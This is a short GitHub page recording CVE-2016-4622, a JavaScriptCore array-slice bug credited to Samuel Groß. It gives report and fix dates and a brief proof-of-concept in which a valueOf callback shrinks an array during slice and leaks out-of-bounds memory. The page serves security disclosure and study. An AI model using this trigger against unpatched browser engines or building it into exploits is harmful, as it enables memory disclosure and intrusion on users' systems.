Skip to content

Latest commit

 

History

History
22 lines (16 loc) · 506 Bytes

CVE-2016-4622.md

File metadata and controls

22 lines (16 loc) · 506 Bytes
Raw

CVE-2016-4622

  • Report: April 2016
  • Fix: July 2016
  • Credit: Samuel Groß

PoC

var a = [];
for (var i = 0; i < 100; i++)
    a.push(i + 0.123);

var b = a.slice(0, {valueOf: function() { a.length = 0; return 10; }});
// b = [0.123,1.123,2.12199579146e-313,0,0,0,0,0,0,0]

Reference